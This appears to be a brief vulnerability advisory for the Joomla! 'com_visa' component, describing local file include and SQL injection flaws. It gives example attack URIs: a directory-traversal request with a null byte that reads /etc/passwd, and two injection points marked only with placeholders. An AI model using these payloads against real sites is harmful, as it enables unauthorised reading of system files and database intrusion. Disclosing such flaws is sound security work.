Joomla! 'com_visa' Component Local File Include and SQL Injection Vulnerabilities

Joomla! 'com_visa' Component Local File Include and SQL Injection Vulnerabilities

Attackers can exploit these issues with a browser.

The following example URIs are available:

http://www.example.com/index.php?option=com_visa&controller=../../../../../../../../../../../../../etc/passwd%00

http://www.example.com/index.php?option=com_visa&view=book&id=23' + [SQL Injection]

http:/www.example.com/index.php?option=com_visa&Itemid=35&page=4' + [SQL Injection]